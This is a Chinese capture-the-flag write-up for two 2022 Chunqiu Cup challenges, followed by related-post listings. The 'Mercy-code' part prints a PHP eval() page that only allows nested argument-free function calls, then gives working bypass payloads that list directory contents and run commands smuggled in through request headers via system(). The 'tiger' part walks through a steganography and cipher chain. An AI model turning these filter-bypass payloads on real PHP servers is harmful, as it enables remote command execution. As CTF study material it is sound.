Mercy-code

无参数RCE，过滤了很多

解法一

<?php
highlight_file(__FILE__);
if ($_POST['cmd']) {$cmd = $_POST['cmd'];if (';' === preg_replace('/[a-z_]+\((?R)?\)/', '', $cmd)) {if (preg_match('/file|if|localeconv|phpversion|sqrt|et|na|nt|strlen|info|path|rand|dec|bin|hex|oct|pi|exp|log|var_dump|pos|current|array|time|se|ord/i', $cmd)) {die('What are you thinking?');} else {eval($cmd);}} else {die('Please calm down');}
}

只允许无参数函数，但是可以嵌套

/[a-z_]+\((?R)?\)/

过滤了一大堆

file|if|localeconv|phpversion|sqrt|et|na|nt|strlen|info|path|rand|dec|bin|hex|oct|pi|exp|log|var_dump|pos|current|array|time|se|ord

带get的带session的都不行了

带print也不行，可利用的都ban了，16进制转也不行

目的还是得到 . 然后用scandir(.) , chr(46) 就是 . 所以现在就是要得到46

用echo 来读目录，end 是最后一个数组

echo(ceil(sinh(cosh(tan(chr(floor(sinh(cosh(tan(cosh(tan(sinh(tan(tan(cosh(cosh(tan(sinh(floor(cosh(cosh(cosh(tan(tan(cosh(sinh(tan(cosh(tan(cosh(tan(floor(sinh(cosh(tan(floor(cosh(tan(tan(end(apache_request_headers())))))))))))))))))))))))))))))))))))))))));
cmd=echo(end(scandir(chr(ceil(sinh(cosh(tan(chr(floor(sinh(cosh(tan(cosh(tan(sinh(tan(tan(cosh(cosh(tan(sinh(floor(cosh(cosh(cosh(tan(tan(cosh(sinh(tan(cosh(tan(cosh(tan(floor(sinh(cosh(tan(floor(cosh(tan(tan(end(apache_request_headers()))))))))))))))))))))))))))))))))))))))))))));

最后的读取：

更多无参数RCE解读：https://blog.csdn.net/a3320315/article/details/102989485/

解法二

解法三

Payload：echo(implode(scandir(chr(strrev(uniqid())))));

Payload：cmd=system(strrev(implode(apache_request_headers())));

tiger

pngkey进行rot47得到

28a217fe

然后解密：cloacked-pixel

python lsb.py extract 1.png key.txt 28a217fe

拿到密码：71zr9H6jnXRHn64WBxMbCzz16saCZWiw

解开压缩包，看起来是明文攻击,密码Nh6i@=

解开是一个二维码

扫出来才一点点，肯定是0宽隐写

再维吉尔解密一下就可以了

【2022春秋杯】两个题wp相关推荐

2022春秋杯勇者山峰 Misc-Tiger WP
拿到题目如下: 首先打开tips.txt文档: 提示了两点: 1.rot 47加密 2.lsb图片隐写再打开另一个文档对里面的内容进行rot47解密得到lsb隐写的密码:28a217fe 对于ls ...
2022春秋杯-春季赛勇者山峰 writeup（misc全部+web签到）
2022春秋杯-春季赛勇者山峰 writeup(misc全部+web签到) 改改比赛wp发上来本文来自csdn的⭐️shu天⭐️,平时会记录ctf.取证和渗透相关的文章,欢迎大家来我的主页:shu ...
2022春秋杯联赛传说殿堂赛道 sql_debug题目解析
2022春秋杯联赛传说殿堂赛道 sql_debug题目解析前言 sql_debug sql_debug 题⽬介绍 dsn_from_uri 触发phar反序列化 Linux下PHP内核调试⼩知识 ...
Android逆向writeup,【技术分享】春秋杯逆向第一题writeup
最近被春秋杯逆向题坑了两天,记录一下解题过程. 程序一运行,就弹个控制台窗口,啥也没有,拖进IDA看了才知道,是在等待用户输入验证的key: 程序的主框架很简单,就是一运行后初始化一些数据,等待用户输 ...
2022年暑期CTF刷题WP（停止更新）
目录攻防世界 MISC simple_transfer Reverse simple-unpack logmein getit Bugku MISC 社工-进阶收集这篇博客用来记录我(一个菜鸡)2 ...
2022亚太杯建模C题思路 : 是否全球变暖？小美赛数学建模 C题思路
1 C题:是否全球变暖? 加拿大的49.6°C创造了地球北纬50°以上地区的气温新纪录,一周内数百人死于高温:美国加利福尼亚州是54.4°C,这是有史以来地球上记录的最高温度:科威特53.5°C,甚至 ...
2022春秋杯-被带走的机密文件
Misc-被带走的机密文件正经取证题,没有任何套娃成分,请师傅们放心食用.(附件较大.) 题目给了一个E01镜像使用取证大师(也有不使用的方法,并且并不是完全依靠取证大师)打开自动取证先简单进行信 ...
2021年“春秋杯”新年欢乐赛--十二宫的挑衅
前言没怎么打,随便玩了一下.发现有一道十二宫杀手密码比较有趣.总结一下题目说明标题:十二宫的挑衅题目文件:Twelve_palaces_of_serial_killers.png(翻译:十二宫 ...
2022蓝帽杯初赛电子取证
手机取证 1. 627604C2-C586-48C1-AA16-FF33C3022159.PNG图片的分辨率是?[答案格式:19201080] 360360 直接搜索-表格视图 2. 姜总的快递单号 ...

【2022春秋杯】两个题wp

Mercy-code

解法一

解法二

解法三

tiger

【2022春秋杯】两个题wp相关推荐

最新文章

热门文章